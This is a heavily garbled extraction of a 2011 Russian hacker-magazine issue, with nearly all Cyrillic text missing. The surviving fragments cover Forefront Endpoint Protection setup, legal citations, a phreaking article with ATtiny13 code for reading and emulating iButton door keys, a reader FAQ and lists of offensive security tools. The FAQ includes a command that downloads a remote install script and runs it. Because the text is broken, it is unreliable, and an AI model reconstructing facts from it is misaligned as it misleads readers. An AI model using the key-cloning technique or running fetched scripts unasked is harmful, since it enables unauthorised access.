Advanced topology .
Reporting Services. URL
. URL, , FQDN .
, MS FEP Windows
Update. , .
Microsoft SpyNet.
. Basic, MS .
, , Advanced . . , ,
.
, .
, ,
. , . ,
.
X 09 /152/ 2011

FEP ,

FEP,
,
, , .
,
SCCM
( , MSSQL)
. ,
, SCCM .
SCCM Computer Management
Forefront Endpoint Protection,
, .
Policies ( ), Alerts ( 4 ) Reports ().
, FEP-*,
Computer Management Desired Configuration Management
Configuration Baselines. . ,
SCCM.
. ,
( ]
[ 08.2009), . Distribute
Software. ,
Select an existing package Microsoft Corporation FEP
Deployment 1.0. ,
, ,
.
, . ,
. , , Deployment Overview.


. ,
, Policies.
, New Policy.
. ( , ). ,
Policy Template,
.
, , (UNC, WSUS
Windows Update).
X 09 /152/ 2011

SCCM 2012
-, . ,
. Windows Firewall , . ,
Edit Policy Precedence
.

, SCCM .
FEP
:
Forefront Endpoint Protection
2010 Security Management Pack.

Forefront Endpoint Protection Server Health Monitoring Management
Pack.
Forefront Endpoint Protection 2010.
.
, GPO ,
.

SCCM, Forefront Endpoint


Protection .
, .
, , FEP , - . z

131

SYN/ACK
. .,


!
,

, . ,
. , ,
, ( , ) , , .

- -
(. 1225 1259 ). ,
(. 1257). . , ,
.

.
, , , ,
, . ,
, , /
- ,
(
, ). ,
(),
(. 1227 ). , ,
, , .
?
, ? , .
.
. 1295 .
( ),
.

. - ,
.
(. ).
, . ,
,
. -
(c) .
, .
, , XIV : , .
.
, -
, , , .

132


,
(. 1288 ), ,
. ,
(. 4 .
1233). ,
, .

,
(, ,
, , ),
,
.
(, , ), () . -,
/ - (MSOffice,
1, ).
, , ,
, . .

(. 1 . 1233), ,
(. 1 . 1229). , , , ,
. ? ? ,
* . :
( , );
( );
( ).
,
, ( 50
).
, .

,
. :
, ,
. X 09 /152/ 2011

IP-

IDS Snort

html- ;
Perl, Java, JavaScript, PHP ..

html-

,
(
)

/ ;

.

.
, ,
. , . .
,
.
.
. ,
, .
, .
? , , ?
, .

X 09 /152/ 2011

( ),
.
.
(, )
,
. . . (, )
.
.
.

. - .

133

SYN/ACK

1295.

1265.

www.consultant.ru/popular/gkrf4/79_2.html#p668

base.garant.ru/10164072/70/#41265

1. ,
,
() ( ),
.

1.


, ()
, ,
,


. .

2.
,

.
,
,
,

,
.
,
,

, .

,

.
,

, .
3. , 2

,
,
, ,
,
.
,
,
, , ,
, .


.


.
, ,
, ..

,
() - ,
, .
,
.
, ,

134

2.
( ,
) (
1 1287),
,

.
,

.

,
.
. ,
,
. ,
.

, . , .
(. 2 3 . 146 ).
, 50 000 . ,
, -
.
, .
,
.
, ,
. 50 ( ),
.

(. 7.12 ),
.
,
. ,

. .
. ,
, ,
. , :
X 09 /152/ 2011

) ;
) ;
) ,
.
. :
(. 1301 ).
,
, .
, ,
,

. .

( )
. , , ,
. . ,

, . ,
, ,
.
:
,
, , ;
, ,
, ;
,
;
- ;
. 1262 ;
, , , (,
);

;
, (,
);
/ ,
;
(
, , - );
, , ,
. ,
, ,
.

, .
,
.

, , , .
( )
. . ,
, ,
.
, ,
.
( . 10 ).
. , ,
, , , ,
,
, .
, ,
.
(. 1251 ).
, :
. , ,
,
. , . ,
.

,
1993 , .
,
.
, .
.
. , , , . () .
.
,

, **.
. ,
,
, .
,
: , . ? . . z

* , ,
, , , . ,
( , ) ,
.
** , , . . (, . 3 . 1250
). . , .

X 09 /152/ 2011

135

PHREAKING
dcoder (dcoder.mail@gmail.com)


iButton
,
iButton,
.

. , ,

,
.

, 1-wire

-, . , , , ,
1-wire.
. . , ,
, , ,
(
).
,
. EEPROM . ,
8 EEPROM- ( , 6 ).
, , learn,
,
. ,
,
.
, -
. , . CR2032,
. ,
, 5V VSB ( )
. 5 V, (, ). (5 V ) .

136

1-wire, ,
. , , .
1-wire , , .
( 5 V) .
.
,
. ,
(, DS18b20).
1-wire (master)
(slave). ,
. ,
.
,
.
( )
. , ,
.
(5-10 ), ( 50-100 ).
,
,
.
: RESET, 480 ,
, PRESENCE,
100-200 , ,
X 09 /152/ 2011

. 1. .
()

. 2. 1-wire

RESET. ,
.
:
1. RESET.
2. PRESENCE ( !).
3. ROM-. 8
ROM- ,
. (
DS1990A iButton)
.
4. ROM-
, . ROM-
Read ROM (0x33).
ROM- . DS1990A
0x01. 6 CRC.
(
CRC) EEPROM.
, CRC .
- ,
. :
RESET PRESENCE- .

, , . , ,
.
: , ,
, . X 09 /152/ 2011

, ,
. ,
. ,
,
. ,
.

.
. , ,
- ARM,
ATTiny13. learn, 1-wire, ( ,
) (.
. 6). ,
, NPN. BC846 SMD-, .
(X1) (X2)
. , ,
.
5
. , . (+5) .
(5 V )
. , -. D1,
D2 . , -

137

PHREAKING

( -> )

( -> )

. 3.
D2, D1 . D2 . , 0,2 .
, .

. (. DI HALTa ][ 118, 2008


). .
. ,
. ,
, .
. -
. ,

. ,
FDD. ViewLayout (goo.gl/kRKXE).
.
, - 1,6 .
, , , . , ,
. ,
( ),
. .

. , 95% , AVR
, .
MikroPascal for AVR ( k , ).
2 .
Tiny13 1 -.
, .
, .
ACSR.ACD := 1; //
DDRB := %00010001; //
//: B4 () B0 ()
PORTB := %00001001; //
MCUCR.SM0 := 1; // power down
MCUCR.SE := 1; //
asm sei end; //

, ,
.
GIFR.INTF0 := 1; //

138

GIMSK.INT0 := 1; //
asm sleep end; //!

INT0 ( B1) .
, ( ,
) sleep.
, INT0_rq.
,
. , (
sleep) .
Delay_ms(2); //,
//
DDRB.1 := 1; // RESET
Delay_us(500);
DDRB.1 := 0;
Delay_us(50);
//,
// PRESENCE-
if PINB.1=1 then continue;
// PRESENCE ,
Delay_us(250); //
//PRESENCE-
Read_iButton; //
if CRC_OK <> 0 then continue;
// CRC

. ,
,
. RESET-.
1 DDRB. . ,
, ( , )
PORTB ( ).
DDRB , . ,
DDRB 1, , 0 , pull-up-. RESET , PRESENCE. ,
, - .
, .
, . :
1. ROM- 0x33.
2. 8 , CRC:
CRC_OK.
3. ROM_Data.
CRC 256 . CRC ,
X 09 /152/ 2011

. 4. RESET PRESENCE,

. 5.
CRC := CRC_Table[CRC xor DataByte];. ,
, CRC = 0. CRC , .
ReadROM- CRC_OK. = 0, .
CRC, ,
iButton ( )
(CRC8).
learn. ,
EEPROM,
. , , ,
, EEPROM. .
, ,
.

, , , ?
,
, : , AVR
.
AVR .
.
COM-. USBCOM . PCICOM .
COM- , , .
, , .
,
:).

. , ? :)
1 10 ,
.
. 5.
, . ,
. (, +5 USB),
Vcc .
- ,
, (Gnd).
Uniprof.
.
Uniprof , ,
. ATTiny13,
flash [1K, 64] Tiny13
1 - 64 EEPROM. ,
( ) .
- Erase.
X 09 /152/ 2011


hex ( , firmware).
.
PROG . ,
. 10
.
.
fuse. ,
, .
,
.
CKDIV8, . ,
1,2 , 9,6 . fuse . fuse . - ,
Read ,
. AVR ,
CKDIV8 , . ,

. 6.
Write,
. , .

, .
, - ,
:). , , AVR
1-wire. ,
. , ,
. . z

139

UNITS
Step (twitter.com/stepah)

faq
united?

faq@real.xakep.ru

Q: DDoS.
wget http://www.inetbase.com/scripts/

ddos/install.sh

chmod 0700 install.sh
- ./install.sh
?
A: -

Q:

. ?

, ?
A:

, iptables.
, ,

(, ). ,
.
(D)DoS Deflate
(deflate.medialayer.com). bash-,
IP-,
, .
:
,

. : iptables
Advanced Policy Firewall (APF). DoS Deflate :

.
-, ,

. ,
(
), , .

,
:
Adminus Malware Analysis Group Samples
(adminus.net/samples.aspx);
Contagio Malware Dump (contagiodump.
blogspot.com);
KernelMode.info (www.kernelmode.info/
forum/viewforum.php?f=16);
MalwareBlacklist (www.malwareblacklist.
com/showMDL.php);
MalwareBytes Forum (forums.

140

/usr/local/ddos/ddos.
conf NO_OF_CONNECTIONS.

,
,
NAT. ,
.
,

,
. ,

,
.

,

, : .

X 09 /152/ 2011


Google



malwarebytes.org);
NovCon Twitter EXE Parsing
(minotauranalysis.com/exetweet);
Offensive Computing (www.
offensivecomputing.net);
SecuBox Labs (secuboxlabs.fr).
-,
, ,
.
URL www.malwaredomainlist.
com www.malwareurl.com.
: ,

, , ,
, .
-,
honeypot,
. ,
.

Q: ,
?
A: ,
100%
. :
Glastopf (glastopf.org) ,
-
.
.
Dionaea (dionaea.carnivore.it) ,
.

Windows,
.
Dionaea

.
Jsunpack-n (code.google.com/p/jsunpack-n)

.
, -
.
, X 09 /152/ 2011

, Omnivora (sourceforge.net/projects/
omnivora) Amun (sourceforge.net/projects/
amunhoney).

Q:
,
?
A:
,
,
Intel Core i5/i7. , Intel
vPro
KVM Remote Control. KVM
(Keyboard Video Mouse)
: KVM-

, . KVM Intel?
,
,
.
,
, ,
. ,

Remote FrameBuffer
( VNC), , ,

, .
Android, ?

.
, ,
.

Intel (intel.ly/pgTnGM),
vPro .
KVM Remote Control
Support. :
,
.

Q: -
Wi-Fi- ?

-
.
.



A: 1.
( omni antenna).
2.
.
, , DD-WRT,

.
Wireless
Advanced Settings,
TX Power,
.
, , 70,

100 ( ,
).
,
. AP
150
.
DD-WRT,
(www.dd-wrt.com).
3.

, .
Wi-Fi (, inSSIDer) ,
.
.
4. ,
AP (
) .
. DD-WRT
Wireless Basic Settings Repeater.
: Wireless Physical Interface (wl0)
Virtual Interfaces (wl0.1).

, SSID
.
Wireless Security
.

141

UNITS

Q: ? , .
A: ,
, , .
Wi-Fi, ,

.
,
.
. ,

.
WiFuzz (code.google.com/p/
wifuzz), ,
.
Python-
Scapy, .

Q: . ,
.
.
?
A: ProduKey
(www.nirsoft.net),
Microsoft Office, Windows, Exchange Server
SQL Server.

( ).
%windir%\
system32\config.

Q: -
Dropbox, .
. ?
A: Dropbox SparkleShare (sparkleshare.org).

,
.
Linux
Mac,
.
github.
com/hbons/SparkleShare.

Q: PowerShell/BAT

. , Windows
,
.
?
A:
WinAPI,

142


.
notifu (www.paralint.
com/projects/notifu).

,
, . , :
notifu /m "Hello, man!"

,
notifu
.

Q: BAT-? , ,
,
.

PowerScript VBScript.
A: , , ,

exe-. ,
Quick Batch File Compiler (www.abyssmedia.
com/quickbfc). VBScript
JavaScript ScriptCryptor Compiler
.
PowerScript,
Make-PS1ExeWrapper (bit.ly/paIgIW).
PrimalScript (www.sapien.com/
software/primalscript),
.

Q:
(- !) ?
A: ,

.

JavaScript,
.

heatmap ,
.
-
,
.
,
, - .
ClickHeat (www.labsmedia.
com/clickheat).
Google
Analytics ..

Q: GMail
,
? ,
/
, . ,
? :)
A: !
,
,

Google.
,
( Multiple sign-in)
.
google.
com/accounts. , Google
,
.

Q:
-.
,
,

.
A:
Plupload (www.plupload.com),

, dragndrop,
,
..

, , , HTML5.
HTML, :
Flash, Gears, Silverlight, BrowserPlus
HTML4. .

Q: , -
Android.
: Android
Market !
?
A: . ,

Android Market , .
,
Android Market
. ,


.
Market
enabler (code.google.com/p/market-enabler).
z

X 09 /152/ 2011

>Net
Angry IP Scanner 3.0-beta6
Axence NetTools 4.0
Cloud Turtle
G+ Notifier 1.7
GPING (Graphical Ping) 1.0.2
Helicon Ape 0068
JStock 1.0.6d
NetGrok

>>UNIX
>Desktop
3dDesktop 0.2.8
Audacious 3.0
Compiz 0.9.5
digiKam 2.0

>Security
Auto Rooter Beta 2011
avast! Linux Home Edition 1.3.0
AVIRA AntiVir Workstation 3.0.2
Complemento 0.7.6
Damn Small SQLi Scanner v0.1f
exploitdbee
F-Prot Antivirus 6.0.3
Firecat 1.6
IP Flood Detector 1.0
Iscanner 0.5
Mantra Security Toolkit 0.6.1

>Net
BitTorrent 5.2.2
DreaMule 3.2
Dropbox 1.1.35
Flush 0.9.11
Google Chrome 13
JAP 00.15.018
Kommute 0.24
Kopete 1.0
Mozilla Firefox 5.0.1
Mumble 1.2.3
Opera 11.50
ProZilla 2.0.4
QuickDownloader 5.0
RealVNC 4.4.3
Teamwork 4.7
theMeStream
Ttcp
>>MAC
Afloat 2.4
atMonitor 2.7b
Backuplist+ 8.0.3
Boxer 1.1.1
Game Hunter 1.1.17
Google Chrome 13
iChm 1.4.3
Integrity 3.7
MacHacha 4.0.1
MakeMKV 1.6.13
Optimizer 1.2
Praat 5.2.35
qBitTorrent 2.8.1
TotalTerminal 1.1.1
Ukelele 2.1.7
XRG 1.6.1
YoruFukurou 2.61
YouTube to MP3 1.5
YouView 0.5 Beta 4

>X-distr
Gentoo Linux 11.2

>System
Aircrack-ng 1.1
AMD Catalyst 11.7
Cpuburn 1.4
CpuTemp 0.1
E2fsprogs 1.41.14
EncFS 1.7.0
LDAP Account Manager 3.4.0
Linux Kernel 3.0.1
Nvidia 280.13
Open Hardware Monitor 0.3.2
Qtnotifydaemon 1.0.4
Shake 0.999
Squashfs 3.4
Ubuntu Tweak 0.5.14
VirtualBox 4.1

>Server
Apache 2.2.19
BIND 9.8.0
CUPS 1.5.0
DHCP 4.2.1
Moment Video Server 1.0
MySQL 5.5.15
nginx 1.1.0
OpenLDAP 2.4.26
OpenSSH 5.8
OpenVPN 2.2.1
PostgreSQL 9.0.4
Samba 3.5.11
Sendmail 8.14.5
Squid 3.1.14
XMail 1.27

Metagoofil 1.4b
Rootkit Hunter 1.3.6
SquidClamAv 6.3
Social-Engineer Toolkit 1.5.3
Sqlninja 0.2.5
Webtest 1.2.1
WPScan

>Multimedia
Blumind 1.3
Doro 1.64
Graphs Made Easy 3.1
MiniLyrics 7.1


:
EasyRecovery 6.1 Professional
(Demo)
File Scavenger
GetDataBack for NTFS V4.21
GetDataBackfor FAT V4.21
R-Studio 5.4
Recuva 1.40
R.saver 1.0
RecoverMyFiles 4.7.2
UFS Explorer Standard Recovery
4.9.2

>System
Appupdater 1.5
Auslogics Disk Defrag 3.2.1
Autoruns 10.07
Comodo System-Cleaner 3.0
DualMonitor Taskbar
ExactFile 1.0
Folder Replica 1.03
GrokEVT 0.5.0
Microsoft Security Essentials
Multi Commander 1.1.1.800
Metamorphose 1.1.2
PC INSPECTOR File Recovery
ProEject 1.0
QtdSync v0.6.15 beta
RAID Reconstructor 4.21
ServiWin 1.48
ShutdownGuard 1.0
USB Flash Benchmark
xplorer lite

>Devel
Apache Ant 1.8.2
Bison 2.5
Crow Designer 2.99.0
Fasm 1.69.31
Glade 3.10.0
Gnat 2011
Intel C++ Compiler 12.0.2
Java SE 7
LevelDB
libjpeg 7
Libnet 1.1.2.1
libusb 0.1.12
Monkeybars 1.0.4
Qooxdoo 1.5
Rats 2.3
TkInter 2.4.2
Waf 1.6.4
zlib 1.2.5

Dynamic window manager 5.9


Hash Checker 4.0.1
JShot 2.0
Kat 0.6.4
Kpackage 3.5.10
NeroLINUX 4.0.0.0
Openbox 3.4.11.2
PieDock 1.4.0
RawTherapee 3.0
Splashy 0.3.13
Wbar 1.3.3
Xfce 4.8.0
XWinWrap 0.10
)

UI-:
360desktop 0.8.5
Acer Gridvista 2.72.317
Bins
Desktops 1.02
eXtra Buttons
Fences
Gmail Notifier Plus 2.1.2
HashTab 4.0
JumpPad 2.1
Launchy 2.6B2
Listary
multibar 1.1.1.0
QTTabBar 2.0.0.0beta
SuperbarMonitor
Switcher 2.0.0
Taskbar Meters 1.1
TeraCopy 2.2 beta 3
Windows 7 Taskbar Items Pinner

>Misc
Blumind 1.3
Gest
Metro Clock 2
Metro Sidebar 1.0
Multi-Tabber 1.0
nSpaces
PowerGDocs 1.1
Tabbles 2.0
WindowsRunHistoryEditor 1.2.0.0

>Games
Subvein 0.692

>Security
Cain & Abel v4.9.41
CrashMe
Durandal
FindBugs 1.3.9
Heap Inspector 1.1
IDR 2.5.2.11 beta
mediggo 0.4.0
Metasploit 4.0
Patriot NG v2.01
PDF Stream Dumper
Process Hacker 2.10
Visual DuxDebugger 2.8
VMSweeper 1.4 Beta 12
Volatility 2.0

Uniform Server 7.1.4


VNC Free Edition for Windows 4.1.3
Wifi Network Backup Manager Utility
Windows Firewall Notifier 1.0.1
Wireless Network Watcher 1.15
Wireshark 1.6.1
zFTPServer Suite 2010-10

09(152) 2011

>>WINDOWS
>Development
GanttProject 2.0.10
IntelliJ IDEA 10.5.1 Free Community
Edition
Jailer 3.6.4
Java SE Development Kit 7
Node.JS 0.5.3
PhoneGap 1.0
Sublime Text 2
Syser Kernel Debugger
1.99.1900.1220 Trial
Syser Win32 Debugger Free
Titanium Studio
wyBuild 2.6
x

,
JAVASCRIPT 050


ANDROID 070

PHPMYADMIN
064



WINDOWS 7

, ,
FOX NEWS

082



: 2
10
.

LULZSEC
09 (152) 2011

GOOGLE CHROME 030

UNITS

HTTP://WWW2

FETCH.IO
fetch.io

CRYPTOCAT
crypto.cat

,
,
Rapidshare, . (, 100-
- ), . ,
JDownloader (jdownloader.org),

CAPTCHA, ,
. 100%- . fetch.io (, Premium-)
(Despositfiles, Rapidshare,
MegaUpload ..) P2P- ( BitTorrent) . ,
, ,
.


.
OTR (Off-theRecord), cryptocat ,
.
( JavaScript ). -
AES-256
.
, . 30 ,
SSL-.
cryptocat, , GitHub (github.com/kaepora/cryptocat).

KEEPMEOUT!
keepmeout.com

KICKSTARTER
www.kickstarter.com

,
, ,
.
Facebook,
, -
, KeepMeOut!.
, .
, KeepMeOut! ,
60 .
, .
. , vkontakte.ru
KeepMeOut! 6- .

- , . ,
, . ,
, !
(, ,
, , , , ) , .
,
, , .
. ,
500 (www.hexbright.com)
$31 000. , ,
,
$259,293. , ?

144

X 09 /152/ 2011